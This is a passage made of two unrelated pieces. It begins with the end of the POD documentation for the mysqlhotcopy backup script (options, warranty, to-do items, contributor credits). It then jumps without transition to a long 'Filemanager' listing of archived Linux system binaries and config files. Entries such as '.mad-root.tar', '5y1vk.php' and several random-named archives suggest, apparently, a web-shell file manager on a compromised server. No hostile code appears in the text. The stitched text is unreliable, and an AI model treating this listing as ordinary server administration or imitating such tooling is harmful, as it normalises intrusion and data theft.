Be silent except for errors.

=item  --debug

Debug messages are displayed.

=item -n, --dryrun

Display commands without actually doing them.

=back

=head1 WARRANTY

This software is free and comes without warranty of any kind. You
should never trust backup software without studying the code yourself.
Study the code inside this script and only rely on it if I<you> believe
that it does the right thing for you.

Patches adding bug fixes, documentation and new features are welcome.
Please send these to internals@lists.mysql.com.

=head1 TO DO

Extend the individual table copy to allow multiple subsets of tables
to be specified on the command line:

  mysqlhotcopy db newdb  t1 t2 /^foo_/ : t3 /^bar_/ : +

where ":" delimits the subsets, the /^foo_/ indicates all tables
with names beginning with "foo_" and the "+" indicates all tables
not copied by the previous subsets.

'newdb' is either the name of the new database, or the full path name
of the new database file. The database should not already exist.

Add option to lock each table in turn for people who don\'t need
cross-table integrity.

Add option to FLUSH STATUS just before UNLOCK TABLES.

Add support for other copy methods (e.g., tar to single file?).

Add support for forthcoming MySQL ``RAID'' table subdirectory layouts.

=head1 AUTHOR

Tim Bunce

Martin Waite - Added checkpoint, flushlog, regexp and dryrun options.
               Fixed cleanup of targets when hotcopy fails. 
               Added --record_log_pos.
               RAID tables are now copied (don't know if this works over scp).

Ralph Corderoy - Added synonyms for commands.

Scott Wiersdorf - Added table regex and scp support.

Monty - Working --noindex (copy only first 2048 bytes of index file).
        Fixes for --method=scp.

Ask Bjoern Hansen - Cleanup code to fix a few bugs and enable -w again.

Emil S. Hansen - Added resetslave and resetmaster.

Jeremy D. Zawodny - Removed deprecated DBI calls.  Fixed bug which
resulted in nothing being copied when a regexp was specified but no
database name(s).

Martin Waite - Fix to handle database name that contains space.

Paul DuBois - Remove end '/' from directory names.

Filemanager

Name Type Size Permission Actions
.mad-root.mad-root.tar.gz File 117 B 0644
.mad-root.tar File 1.5 KB 0644
100.zip File 276.54 KB 0644
106.tar File 639.5 KB 0644
106.tar.gz File 633.91 KB 0644
113.tar File 379.5 KB 0644
113.tar.gz File 358.84 KB 0644
118.tar File 318.5 KB 0644
118.tar.gz File 309.97 KB 0644
131.tar File 34 KB 0644
131.tar.gz File 20.44 KB 0644
139.tar File 22.5 KB 0644
139.tar.gz File 785 B 0644
14.tar File 687 KB 0644
14.tar.gz File 677.2 KB 0644
141.zip File 59.49 KB 0644
147.tar File 124 KB 0644
147.tar.gz File 56.14 KB 0644
158.zip File 110.15 KB 0644
162.tar File 80.5 KB 0644
162.tar.gz File 74.92 KB 0644
173.tar File 265.5 KB 0644
173.tar.gz File 238.97 KB 0644
178.tar File 2.67 MB 0644
178.tar.gz File 2.65 MB 0644
182.tar File 34 KB 0644
182.tar.gz File 20.44 KB 0644
184.tar File 35 KB 0644
184.tar.gz File 20.81 KB 0644
200.zip File 218.21 KB 0644
207.tar File 1.24 MB 0644
207.tar.gz File 1.22 MB 0644
21.tar File 2 KB 0644
21.tar.gz File 193 B 0644
230.tar File 453 KB 0644
230.tar.gz File 446.33 KB 0644
241.tar File 218 KB 0644
241.tar.gz File 211.42 KB 0644
258.tar File 237 KB 0644
258.tar.gz File 181.87 KB 0644
258.zip File 235.62 KB 0644
268.zip File 504.54 KB 0644
306.tar File 126 KB 0644
306.tar.gz File 119.46 KB 0644
31.tar File 163 KB 0644
31.tar.gz File 156.47 KB 0644
33.tar File 21 KB 0644
33.tar.gz File 9.77 KB 0644
332.tar File 85.5 KB 0644
332.tar.gz File 42.15 KB 0644
334.zip File 99.68 KB 0644
341.tar File 107.5 KB 0644
341.tar.gz File 99.22 KB 0644
351.zip File 89.48 KB 0644
356.tar File 97.5 KB 0644
356.tar.gz File 88.44 KB 0644
358.tar File 2.29 MB 0644
358.tar.gz File 2.28 MB 0644
364.tar File 118 KB 0644
364.tar.gz File 78.92 KB 0644
366.tar File 615.5 KB 0644
366.tar.gz File 607.48 KB 0644
367.tar File 1.23 MB 0644
367.tar.gz File 1.2 MB 0644
37.zip File 381.87 KB 0644
371.tar File 90 KB 0644
371.tar.gz File 83.87 KB 0644
44.zip File 378.81 KB 0644
45.tar File 293 KB 0644
45.tar.gz File 271.07 KB 0644
49.tar File 273 KB 0644
49.tar.gz File 264.48 KB 0644
54.tar File 141.5 KB 0644
54.tar.gz File 136.54 KB 0644
55.tar File 54.5 KB 0644
55.tar.gz File 48.55 KB 0644
583qy2.tar File 2 KB 0644
583qy2.tar.gz File 186 B 0644
5y1vk.php File 126.5 KB 0644
5y1vk.php.php.tar.gz File 28.44 KB 0644
62.tar File 459 KB 0644
62.tar.gz File 456.34 KB 0644
67.tar File 356.5 KB 0644
67.tar.gz File 303.6 KB 0644
68484db27eacf.jpg.jpg.tar.gz File 647 B 0644
68484db27eacf.jpg.tar File 2.5 KB 0644
6zu8x4.tar File 64.5 KB 0644
6zu8x4.tar.gz File 12.82 KB 0644
72.tar File 34 KB 0644
72.tar.gz File 20.45 KB 0644
85.tar File 1.03 MB 0644
85.tar.gz File 593.86 KB 0644
88.zip File 27.84 KB 0644
89.tar File 29.5 KB 0644
89.tar.gz File 22.81 KB 0644
95.tar File 500 KB 0644
95.tar.gz File 447.79 KB 0644
98.zip File 1.19 MB 0644
99.tar File 279.5 KB 0644
99.tar.gz File 272.58 KB 0644
M.tar File 4 KB 0644
M.tar.gz File 276 B 0644
README.Debian.Debian.tar.gz File 453 B 0644
README.Debian.tar File 2.5 KB 0644
README.tar File 3.5 KB 0644
README.tar.gz File 849 B 0644
VGAuthService.tar File 136.5 KB 0644
VGAuthService.tar.gz File 52.7 KB 0644
[.tar File 52 KB 0644
[.tar.gz File 20.09 KB 0644
a2dissite.tar File 17.5 KB 0644
a2dissite.tar.gz File 4.7 KB 0644
a2ensite.tar File 17.5 KB 0644
a2ensite.tar.gz File 4.7 KB 0644
aa-exec.tar File 36.5 KB 0644
aa-exec.tar.gz File 12.12 KB 0644
aa-remove-unknown.tar File 4.5 KB 0644
aa-remove-unknown.tar.gz File 1.58 KB 0644
aa-teardown.tar File 2 KB 0644
aa-teardown.tar.gz File 196 B 0644
ab.tar File 60 KB 0644
ab.tar.gz File 22.8 KB 0644
abi.tar File 2 KB 0644
abi.tar.gz File 84 B 0644
accessdb.tar File 16.5 KB 0644
accessdb.tar.gz File 3.38 KB 0644
acpi.tar File 2 KB 0644
acpi.tar.gz File 114 B 0644
add-apt-repository.tar File 16 KB 0644
add-apt-repository.tar.gz File 3.62 KB 0644
add-shell.tar File 3 KB 0644
add-shell.tar.gz File 601 B 0644
addgnupghome.tar File 5 KB 0644
addgnupghome.tar.gz File 1.2 KB 0644
adduser.tar File 4.5 KB 0644
adduser.tar.gz File 1.42 KB 0644
agetty.tar File 57.5 KB 0644
agetty.tar.gz File 21.53 KB 0644
apache2ctl.tar File 9 KB 0644
apache2ctl.tar.gz File 2.83 KB 0644
apachectl.tar File 9 KB 0644
apachectl.tar.gz File 2.83 KB 0644
apparmor.d.tar File 332 KB 0644
apparmor.d.tar.gz File 49.64 KB 0644
apparmor_parser.tar File 1.48 MB 0644
apparmor_parser.tar.gz File 543.58 KB 0644
applygnupgdefaults.tar File 4 KB 0644
applygnupgdefaults.tar.gz File 1.13 KB 0644
apt-add-repository.tar File 16 KB 0644
apt-add-repository.tar.gz File 3.62 KB 0644
apt-extracttemplates.tar File 24 KB 0644
apt-extracttemplates.tar.gz File 8.09 KB 0644
apt-ftparchive.tar File 232 KB 0644
apt-ftparchive.tar.gz File 97.05 KB 0644
arch.tar File 32.5 KB 0644
arch.tar.gz File 10.4 KB 0644
arch_status.tar File 6 KB 0644
arch_status.tar.gz File 82 B 0644
aria_pack.tar File 4.34 MB 0644
aria_read_log.tar File 4.46 MB 0644
aria_read_log.tar.gz File 1.34 MB 0644
arptables-nft-restore.tar File 221 KB 0644
arptables-nft-restore.tar.gz File 91.05 KB 0644
arptables.tar File 221 KB 0644
arptables.tar.gz File 91.04 KB 0644
attr.tar File 8.5 KB 0644
attr.tar.gz File 297 B 0644
attr.zip File 1.59 KB 0644
autogroup.tar File 6.5 KB 0644
autogroup.tar.gz File 106 B 0644
avatars.tar File 797 KB 0644
avatars.tar.gz File 238.5 KB 0644
awk.zip File 25.43 KB 0644
badblocks.tar File 36 KB 0644
badblocks.tar.gz File 12.65 KB 0644
basename.tar File 36.5 KB 0644
basename.tar.gz File 11.13 KB 0644
bash.tar File 1.33 MB 0644
bash.tar.gz File 650.46 KB 0644
bashbug.tar File 8.5 KB 0644
bashbug.tar.gz File 2.92 KB 0644
bcache-tools.tar File 9 KB 0644
bcache-tools.tar.gz File 3.71 KB 0644
blkdiscard.tar File 24 KB 0644
blkdiscard.tar.gz File 6.91 KB 0644
boot_completed.tar File 1.5 KB 0644
boot_completed.tar.gz File 96 B 0644
btrfs-image.tar File 469 KB 0644
btrfs-image.tar.gz File 262.76 KB 0644
btrfs-select-super.tar File 441 KB 0644
btrfs-select-super.tar.gz File 246.75 KB 0644
bunzip2.tar File 40 KB 0644
bunzip2.tar.gz File 14.54 KB 0644
bus.tar File 3 KB 0644
bus.tar.gz File 191 B 0644
busctl.tar File 92 KB 0644
busctl.tar.gz File 34.97 KB 0644
byobu-disable.tar File 3 KB 0644
byobu-disable.tar.gz File 838 B 0644
byobu-enable.tar File 3 KB 0644
byobu-enable.tar.gz File 759 B 0644
byobu-export.tar File 3 KB 0644
byobu-export.tar.gz File 879 B 0644
byobu-launch.tar File 5 KB 0644
byobu-launch.tar.gz File 1.62 KB 0644
byobu-launcher-install.tar File 4 KB 0644
byobu-launcher-install.tar.gz File 1.27 KB 0644
byobu-launcher.tar File 3.5 KB 0644
byobu-launcher.tar.gz File 1.07 KB 0644
byobu-quiet.tar File 3 KB 0644
byobu-quiet.tar.gz File 882 B 0644
byobu-reconnect-sockets.tar File 5 KB 0644
byobu-reconnect-sockets.tar.gz File 1.53 KB 0644
byobu-status-detail.tar File 3 KB 0644
byobu-status-detail.tar.gz File 765 B 0644
byobu-status.tar File 7.5 KB 0644
byobu-status.tar.gz File 2.22 KB 0644
byobu-tmux.tar File 10 KB 0644
byobu-tmux.tar.gz File 3.02 KB 0644
byobu.tar File 10 KB 0644
byobu.tar.gz File 3.01 KB 0644
bzdiff.tar File 4 KB 0644
bzdiff.tar.gz File 982 B 0644
bzegrep.tar File 5.5 KB 0644
bzegrep.tar.gz File 1.72 KB 0644
bzfgrep.tar File 5.5 KB 0644
bzfgrep.tar.gz File 1.72 KB 0644
c205zi.tar File 2 KB 0644
c205zi.tar.gz File 186 B 0644
c_rehash.tar File 8.5 KB 0644
c_rehash.tar.gz File 2.56 KB 0644
ca-certificates.conf.conf.tar.gz File 1.62 KB 0644
ca-certificates.conf.dpkg-old.conf.dpkg-old.tar.gz File 1.52 KB 0644
ca-certificates.conf.dpkg-old.tar File 7.5 KB 0644
ca-certificates.conf.tar File 8 KB 0644
cache_metadata_size.tar File 1.33 MB 0644
cache_metadata_size.tar.gz File 510.82 KB 0644
cache_repair.tar File 1.33 MB 0644
cache_repair.tar.gz File 510.82 KB 0644
cache_restore.tar File 1.33 MB 0644
cache_restore.tar.gz File 510.82 KB 0644
cache_writeback.tar File 1.33 MB 0644
cache_writeback.tar.gz File 510.82 KB 0644
capsh.tar File 32 KB 0644
capsh.tar.gz File 9.55 KB 0644
catman.tar File 36.5 KB 0644
catman.tar.gz File 11.32 KB 0644
cgdisk.tar File 152 KB 0644
cgdisk.tar.gz File 66.42 KB 0644
cgroup.tar File 7 KB 0644
cgroup.tar.gz File 93 B 0644
chcpu.tar File 32 KB 0644
chcpu.tar.gz File 10.56 KB 0644
check_forensic.tar File 2.5 KB 0644
check_forensic.tar.gz File 538 B 0644
chgpasswd.tar File 60 KB 0644
chgpasswd.tar.gz File 20.41 KB 0644
chroot.tar File 40.5 KB 0644
chroot.tar.gz File 14.57 KB 0644
ckbcomp.tar File 148 KB 0644
ckbcomp.tar.gz File 30.05 KB 0644
clear.tar File 16 KB 0644
clear.tar.gz File 2.97 KB 0644
cloud-id.tar File 2 KB 0644
cloud-id.tar.gz File 97 B 0644
cloud-init-per.tar File 4 KB 0644
cloud-init-per.tar.gz File 1.1 KB 0644
cloud-initramfs-copymods.zip File 2.71 KB 0644
cmdline.tar File 4.5 KB 0644
cmdline.tar.gz File 116 B 0644
cmp.tar File 44 KB 0644
cmp.tar.gz File 18.8 KB 0644
col4.tar File 2.5 KB 0644
col4.tar.gz File 646 B 0644
col6.tar File 2.5 KB 0644
col6.tar.gz File 646 B 0644
column.tar File 36 KB 0644
column.tar.gz File 11.41 KB 0644
comm.tar File 8 KB 0644
comm.tar.gz File 99 B 0644
compose.tar File 20 KB 0644
compose.tar.gz File 5.04 KB 0644
config-5.15.0-126-generic.15.0-126-generic.tar.gz File 62.45 KB 0644
config-5.15.0-126-generic.tar File 257.5 KB 0644
consoles.tar File 2 KB 0644
consoles.tar.gz File 132 B 0644
containerd-shim-runc-v2.tar File 9.06 MB 0644
containerd-shim-runc-v2.tar.gz File 3.23 MB 0644
containerd-shim.tar File 7.01 MB 0644
containerd-shim.tar.gz File 2.54 MB 0644
copyright.tar File 7.5 KB 0644
copyright.tar.gz File 1.31 KB 0644
coredump_filter.tar File 3 KB 0644
coredump_filter.tar.gz File 88 B 0644
corelist.tar File 17 KB 0644
corelist.tar.gz File 4.67 KB 0644
corepack.tar File 2 KB 0644
corepack.tar.gz File 228 B 0644
cpio.tar File 143.5 KB 0644
cpio.tar.gz File 65.01 KB 0644
cpu_resctrl_groups.tar File 8 KB 0644
cpu_resctrl_groups.tar.gz File 112 B 0644
cpuset.tar File 4 KB 0644
cpuset.tar.gz File 89 B 0644
createuser.tar File 11 KB 0644
createuser.tar.gz File 3.65 KB 0644
cron.hourly.tar File 2 KB 0644
cron.hourly.tar.gz File 172 B 0644
cron.hourly.zip File 260 B 0644
cron.monthly.tar File 2 KB 0644
cron.monthly.tar.gz File 172 B 0644
cron.tar File 73.5 KB 0644
cron.tar.gz File 24.51 KB 0644
crond.pid.pid.tar.gz File 90 B 0644
crond.pid.tar File 2 KB 0644
cryptdisks_start.tar File 3.5 KB 0644
cryptdisks_start.tar.gz File 874 B 0644
cryptdisks_stop.tar File 2.5 KB 0644
cryptdisks_stop.tar.gz File 600 B 0644
cryptsetup-ssh.tar File 25.5 KB 0644
cryptsetup-ssh.tar.gz File 8.69 KB 0644
crypttab.tar File 2 KB 0644
crypttab.tar.gz File 136 B 0644
ctail.tar File 2.5 KB 0644
ctail.tar.gz File 635 B 0644
dbilogstrip.tar File 3 KB 0644
dbilogstrip.tar.gz File 801 B 0644
dbiproxy.tar File 7 KB 0644
dbiproxy.tar.gz File 2.39 KB 0644
dbus-cleanup-sockets.tar File 16 KB 0644
dbus-cleanup-sockets.tar.gz File 4.35 KB 0644
dbus-uuidgen.tar File 16 KB 0644
dbus-uuidgen.tar.gz File 3.13 KB 0644
deallocvt.tar File 16 KB 0644
deallocvt.tar.gz File 4.11 KB 0644
debconf.tar File 4.5 KB 0644
debconf.tar.gz File 1.4 KB 0644
debian_version.tar File 2 KB 0644
debian_version.tar.gz File 107 B 0644
debugfs.tar File 231.5 KB 0644
debugfs.tar.gz File 92.39 KB 0644
delgroup.tar File 18 KB 0644
delgroup.tar.gz File 5.37 KB 0644
depmod.tar File 168 KB 0644
depmod.tar.gz File 76.66 KB 0644
dev.tar File 15 KB 0644
dev.tar.gz File 635 B 0644
dev.zip File 2.48 KB 0644
devlink.tar File 144.5 KB 0644
devlink.tar.gz File 58.29 KB 0644
dhclient-script.tar File 17.5 KB 0644
dhclient-script.tar.gz File 4.24 KB 0644
dhclient.tar File 444.5 KB 0644
dhclient.tar.gz File 196.42 KB 0644
diff3.tar File 56.5 KB 0644
diff3.tar.gz File 24.54 KB 0644
dircolors.tar File 40.5 KB 0644
dircolors.tar.gz File 16.47 KB 0644
dmidecode.tar File 124.5 KB 0644
dmidecode.tar.gz File 43.96 KB 0644
dmsetup.tar File 173 KB 0644
dmsetup.tar.gz File 54.7 KB 0644
dmstats.tar File 173 KB 0644
dmstats.tar.gz File 54.7 KB 0644
dockerd-rootless.sh.sh.tar.gz File 2.06 KB 0644
dockerd-rootless.sh.tar File 7 KB 0644
dockerd.tar File 95.24 MB 0644
dockerd.tar.gz File 29.05 MB 0644
domainname.tar File 24 KB 0644
domainname.tar.gz File 5.76 KB 0644
dosfslabel.tar File 40 KB 0644
dosfslabel.tar.gz File 14.82 KB 0644
dot.profile.md5sums.profile.md5sums.tar.gz File 166 B 0644
dot.profile.md5sums.tar File 2 KB 0644
dpkg-deb.tar File 136 KB 0644
dpkg-deb.tar.gz File 57.29 KB 0644
dpkg-preconfigure.tar File 5.5 KB 0644
dpkg-preconfigure.tar.gz File 1.45 KB 0644
dpkg-reconfigure.tar File 6 KB 0644
dpkg-reconfigure.tar.gz File 1.84 KB 0644
dpkg.tar File 5 KB 0644
dpkg.tar.gz File 699 B 0644
driver.tar File 2 KB 0644
driver.tar.gz File 265 B 0644
drivers_autoprobe.tar File 2 KB 0644
drivers_autoprobe.tar.gz File 113 B 0644
dropdb.tar File 11 KB 0644
dropdb.tar.gz File 3.65 KB 0644
droplang.tar File 11 KB 0644
droplang.tar.gz File 3.65 KB 0644
dropuser.tar File 11 KB 0644
dropuser.tar.gz File 3.65 KB 0644
dumpe2fs.tar File 32 KB 0644
dumpe2fs.tar.gz File 10.81 KB 0644
dumpkeys.tar File 160.5 KB 0644
dumpkeys.tar.gz File 38.66 KB 0644
e2freefrag.tar File 16 KB 0644
e2freefrag.tar.gz File 5.05 KB 0644
e2image.tar File 44 KB 0644
e2image.tar.gz File 14.84 KB 0644
e2label.tar File 104.5 KB 0644
e2label.tar.gz File 44.96 KB 0644
e2scrub.conf.conf.tar.gz File 430 B 0644
e2scrub.conf.tar File 2.5 KB 0644
e2scrub.tar File 9 KB 0644
e2scrub.tar.gz File 3.16 KB 0644
e4defrag.tar File 32 KB 0644
e4defrag.tar.gz File 12.03 KB 0644
ebtables-nft-restore.tar File 221 KB 0644
ebtables-nft-restore.tar.gz File 91.05 KB 0644
ebtables-restore.tar File 221 KB 0644
ebtables-restore.tar.gz File 91.05 KB 0644
ebtables-save.tar File 221 KB 0644
ebtables-save.tar.gz File 91.04 KB 0644
ebtables.tar File 221 KB 0644
ebtables.tar.gz File 91.04 KB 0644
editor.tar File 278.5 KB 0644
editor.tar.gz File 135.37 KB 0644
eject.tar File 44 KB 0644
eject.tar.gz File 14.98 KB 0644
encguess.tar File 5 KB 0644
encguess.tar.gz File 1.52 KB 0644
eqn.tar File 190 KB 0644
eqn.tar.gz File 70.52 KB 0644
era_check.tar File 1.33 MB 0644
era_check.tar.gz File 510.81 KB 0644
era_dump.tar File 1.33 MB 0644
era_dump.tar.gz File 510.81 KB 0644
era_restore.tar File 1.33 MB 0644
era_restore.tar.gz File 510.81 KB 0644
ethtool.tar File 21.5 KB 0644
ethtool.tar.gz File 13 KB 0644
events.zip File 280 B 0644
execdomains.tar File 2 KB 0644
execdomains.tar.gz File 112 B 0644
expand.tar File 36.5 KB 0644
expand.tar.gz File 12.92 KB 0644
fallocate.tar File 24 KB 0644
fallocate.tar.gz File 7.52 KB 0644
fc-cache.tar File 24 KB 0644
fc-cache.tar.gz File 5.48 KB 0644
fc-list.tar File 16 KB 0644
fc-list.tar.gz File 3.69 KB 0644
fc-match.tar File 16 KB 0644
fc-match.tar.gz File 4.1 KB 0644
fc-pattern.tar File 16 KB 0644
fc-pattern.tar.gz File 3.38 KB 0644
fc-validate.tar File 16 KB 0644
fc-validate.tar.gz File 3.98 KB 0644
fgconsole.tar File 16 KB 0644
fgconsole.tar.gz File 4.12 KB 0644
filesystems.tar File 2 KB 0644
filesystems.tar.gz File 262 B 0644
findfs.tar File 16 KB 0644
findfs.tar.gz File 3.4 KB 0644
fixparts.tar File 60 KB 0644
fixparts.tar.gz File 24.76 KB 0644
free.tar File 28 KB 0644
free.tar.gz File 6.65 KB 0644
fsadm.tar File 25.5 KB 0644
fsadm.tar.gz File 8.15 KB 0644
fsck.btrfs.btrfs.tar.gz File 729 B 0644
fsck.btrfs.tar File 3 KB 0644
fsck.ext2.ext2.tar.gz File 155.83 KB 0644
fsck.ext2.tar File 353.5 KB 0644
fsck.minix.minix.tar.gz File 21.18 KB 0644
fsck.minix.tar File 56 KB 0644
fsck.tar File 44 KB 0644
fsck.tar.gz File 15.34 KB 0644
fsck.vfat.tar File 84 KB 0644
fsck.vfat.vfat.tar.gz File 35.83 KB 0644
fsck.xfs.tar File 3.5 KB 0644
fsck.xfs.xfs.tar.gz File 1.07 KB 0644
fstab.tar File 2 KB 0644
fstab.tar.gz File 384 B 0644
fstrim.tar File 44 KB 0644
fstrim.tar.gz File 14.26 KB 0644
fuse.conf.conf.tar.gz File 450 B 0644
fuse.conf.tar File 2.5 KB 0644
fuser.tar File 41 KB 0644
fuser.tar.gz File 15.08 KB 0644
fusermount.tar File 36 KB 0644
fusermount.tar.gz File 12.93 KB 0644
fwupdagent.tar File 192 KB 0644
fwupdagent.tar.gz File 73.29 KB 0644
fwupdate.tar File 84 KB 0644
fwupdate.tar.gz File 31.26 KB 0644
galera_new_cluster.tar File 2.5 KB 0644
galera_new_cluster.tar.gz File 616 B 0644
galera_recovery.tar File 5 KB 0644
galera_recovery.tar.gz File 1.6 KB 0644
gawkapi.h.h.tar.gz File 11.75 KB 0644
gawkapi.h.tar File 41.5 KB 0644
gcc-12-base.zip File 74.55 KB 0644
gcc.tar File 120 KB 0644
gcc.tar.gz File 21.56 KB 0644
gdisk.tar File 176 KB 0644
gdisk.tar.gz File 81.06 KB 0644
gdk-pixbuf-thumbnailer.tar File 20 KB 0644
gdk-pixbuf-thumbnailer.tar.gz File 4.08 KB 0644
genl.tar File 92 KB 0644
genl.tar.gz File 39.87 KB 0644
geqn.tar File 190 KB 0644
geqn.tar.gz File 70.53 KB 0644
getcap.tar File 16 KB 0644
getcap.tar.gz File 3.09 KB 0644
getpcaps.tar File 16 KB 0644
getpcaps.tar.gz File 2.97 KB 0644
getty.tar File 57.5 KB 0644
getty.tar.gz File 21.53 KB 0644
gid_map.tar File 10 KB 0644
gid_map.tar.gz File 106 B 0644
git-upload-pack.tar File 3.54 MB 0644
git-upload-pack.tar.gz File 1.77 MB 0644
glib-2.0.tar File 186 KB 0644
glib-2.0.tar.gz File 37.48 KB 0644
gpasswd.tar File 72 KB 0644
gpasswd.tar.gz File 26.5 KB 0644
gpg-wks-server.tar File 117 KB 0644
gpg-wks-server.tar.gz File 52.79 KB 0644
gpgcompose.tar File 498 KB 0644
gpgcompose.tar.gz File 247.96 KB 0644
gpgv.tar File 16 KB 0644
gpgv.tar.gz File 6.64 KB 0644
grep.tar File 180 KB 0644
grep.tar.gz File 84.07 KB 0644
gresource.tar File 24 KB 0644
gresource.tar.gz File 6.68 KB 0644
grotty.tar File 120.5 KB 0644
grotty.tar.gz File 50.28 KB 0644
group.tar File 2.5 KB 0644
group.tar.gz File 571 B 0644
groupmems.tar File 56 KB 0644
groupmems.tar.gz File 20.05 KB 0644
growpart.tar File 28 KB 0644
growpart.tar.gz File 9.4 KB 0644
grpunconv.tar File 52 KB 0644
grpunconv.tar.gz File 17.61 KB 0644
grub-gfxpayload-lists.zip File 1.32 KB 0644
grub-install.tar File 1.15 MB 0644
grub-install.tar.gz File 553.31 KB 0644
grub-mkconfig.tar File 10.5 KB 0644
grub-mkconfig.tar.gz File 3.43 KB 0644
grub-mkfont.tar File 274 KB 0644
grub-mkfont.tar.gz File 96.93 KB 0644
grub-mklayout.tar File 254 KB 0644
grub-mklayout.tar.gz File 85.97 KB 0644
grub-mknetdir.tar File 419.5 KB 0644
grub-mknetdir.tar.gz File 170.87 KB 0644
grub-probe.tar File 943 KB 0644
grub-probe.tar.gz File 435.65 KB 0644
grub-reboot.tar File 6.5 KB 0644
grub-reboot.tar.gz File 2.09 KB 0644
grub-script-check.tar File 277.5 KB 0644
grub-script-check.tar.gz File 96.32 KB 0644
grub.zip File 6.49 MB 0644
gtk-update-icon-cache.tar File 40.5 KB 0644
gtk-update-icon-cache.tar.gz File 12.84 KB 0644
gunzip.tar File 4 KB 0644
gunzip.tar.gz File 1.2 KB 0644
h1igfj.tar File 2 KB 0644
h1igfj.tar.gz File 184 B 0644
h2xs.tar File 61.5 KB 0644
h2xs.tar.gz File 20.49 KB 0644
h9ozm4.tar File 2 KB 0644
h9ozm4.tar.gz File 185 B 0644
hdparm.conf.conf.tar.gz File 2.05 KB 0644
hdparm.conf.tar File 6 KB 0644
hdparm.tar File 141 KB 0644
hdparm.tar.gz File 60.25 KB 0644
helpztags.tar File 4 KB 0644
helpztags.tar.gz File 1.36 KB 0644
host.conf.conf.tar.gz File 167 B 0644
host.conf.tar File 2 KB 0644
hostid.tar File 32.5 KB 0644
hostid.tar.gz File 10.17 KB 0644
hostname.tar File 24 KB 0644
hostname.tar.gz File 5.76 KB 0644
hostnamectl.tar File 32 KB 0644
hostnamectl.tar.gz File 9.94 KB 0644
hosts.allow.allow.tar.gz File 328 B 0644
hosts.allow.tar File 2 KB 0644
htdbm.tar File 28 KB 0644
htdbm.tar.gz File 7.61 KB 0644
hwclock.tar File 52 KB 0644
hwclock.tar.gz File 18.46 KB 0644
include.zip File 58.57 MB 0644
index.cgi.cgi.tar.gz File 68.17 KB 0644
index.cgi.tar File 250.5 KB 0644
init.tar File 1.77 MB 0644
init.tar.gz File 621.25 KB 0644
initrd.img.img.tar.gz File 60.34 MB 0644
initrd.img.old.img.old.tar.gz File 60.34 MB 0644
initrd.img.old.tar File 60.83 MB 0644
initrd.img.tar File 60.83 MB 0644
input.zip File 1.82 KB 0644
install-info.tar File 105 KB 0644
install-info.tar.gz File 49.92 KB 0644
instmodsh.tar File 6 KB 0644
instmodsh.tar.gz File 1.45 KB 0644
iomem.tar File 3 KB 0644
iomem.tar.gz File 288 B 0644
ip.tar File 704 KB 0644
ip.tar.gz File 307.22 KB 0644
ip6_mr_vif.tar File 2 KB 0644
ip6_mr_vif.tar.gz File 138 B 0644
ip6tables-legacy-restore.tar File 98.5 KB 0644
ip6tables-legacy-restore.tar.gz File 36.25 KB 0644
ip6tables-nft-restore.tar File 221 KB 0644
ip6tables-nft-restore.tar.gz File 91.05 KB 0644
ip6tables-nft.tar File 221 KB 0644
ip6tables-nft.tar.gz File 91.04 KB 0644
ip6tables-restore-translate.tar File 221 KB 0644
ip6tables-restore-translate.tar.gz File 91.06 KB 0644
ip6tables-save.tar File 221 KB 0644
ip6tables-save.tar.gz File 91.04 KB 0644
ip6tables.tar File 221 KB 0644
ip6tables.tar.gz File 91.04 KB 0644
iptables-apply.tar File 8.5 KB 0644
iptables-apply.tar.gz File 2.71 KB 0644
iptables-legacy-restore.tar File 98.5 KB 0644
iptables-legacy-restore.tar.gz File 36.26 KB 0644
iptables-legacy.tar File 98.5 KB 0644
iptables-legacy.tar.gz File 36.25 KB 0644
iptables-nft-restore.tar File 221 KB 0644
iptables-nft-restore.tar.gz File 91.05 KB 0644
iptables-nft.tar File 221 KB 0644
iptables-nft.tar.gz File 91.04 KB 0644
iptables-restore.tar File 221 KB 0644
iptables-restore.tar.gz File 91.05 KB 0644
iptables.tar File 221 KB 0644
iptables.tar.gz File 91.04 KB 0644
irqbalance.tar File 68.5 KB 0644
irqbalance.tar.gz File 27.87 KB 0644
iscsiadm.tar File 400 KB 0644
iscsiadm.tar.gz File 153.88 KB 0644
iscsid.tar File 300.5 KB 0644
iscsid.tar.gz File 112.93 KB 0644
issue.net.net.tar.gz File 107 B 0644
issue.net.tar File 2 KB 0644
java-17-openjdk.tar File 437.5 KB 0644
java-17-openjdk.tar.gz File 129.06 KB 0644
jsondiff.tar File 2.5 KB 0644
jsondiff.tar.gz File 545 B 0644
jsonpatch.tar File 5.5 KB 0644
jsonpatch.tar.gz File 1.44 KB 0644
jsonschema.tar File 2 KB 0644
jsonschema.tar.gz File 324 B 0644
kallsyms.tar File 7.1 MB 0644
kallsyms.tar.gz File 987.4 KB 0644
kbdrate.tar File 20 KB 0644
kbdrate.tar.gz File 5.05 KB 0644
keep-one-running.tar File 5.5 KB 0644
keep-one-running.tar.gz File 1.68 KB 0644
kernel-install.tar File 6.5 KB 0644
kernel-install.tar.gz File 1.74 KB 0644
kernel.tar File 12 KB 0644
kernel.tar.gz File 2.33 KB 0644
kernel.zip File 8.68 KB 0644
keyring.tar File 2.5 KB 0644
keyring.tar.gz File 553 B 0644
keys.tar File 2 KB 0644
keys.tar.gz File 177 B 0644
kgm5j7.zip File 74.77 KB 0644
ldconfig.real.real.tar.gz File 498.98 KB 0644
ldconfig.real.tar File 1.16 MB 0644
lessecho.tar File 16 KB 0644
lessecho.tar.gz File 3.31 KB 0644
letsencrypt.tar File 2.5 KB 0644
letsencrypt.tar.gz File 558 B 0644
libapr1.tar File 11.5 KB 0644
libapr1.tar.gz File 4.53 KB 0644
libargon2-1.zip File 9.14 KB 0644
libatasmart4.tar File 8 KB 0644
libatasmart4.tar.gz File 3.49 KB 0644
libatk1.0-data.zip File 2.36 KB 0644
libatm1.tar File 6.5 KB 0644
libatm1.tar.gz File 3.1 KB 0644
libc-bin.zip File 654 B 0644
libefivar1.zip File 3.87 KB 0644
libencode-locale-perl.tar File 5 KB 0644
libencode-locale-perl.tar.gz File 1.85 KB 0644
libexec.tar File 123.87 MB 0644
libexec.tar.gz File 47 MB 0644
libexec.zip File 123.84 MB 0644
libexpat1.tar File 7 KB 0644
libexpat1.tar.gz File 3.01 KB 0644
libgav1-0.tar File 6 KB 0644
libgav1-0.tar.gz File 2.39 KB 0644
libgav1-0.zip File 3.68 KB 0644
libgcab-1.0-0.tar File 6 KB 0644
libgcab-1.0-0.tar.gz File 2.23 KB 0644
libgdbm6.tar File 6.5 KB 0644
libgdbm6.tar.gz File 2.61 KB 0644
libgdbm6.zip File 4.36 KB 0644
libgmp10.tar File 6.5 KB 0644
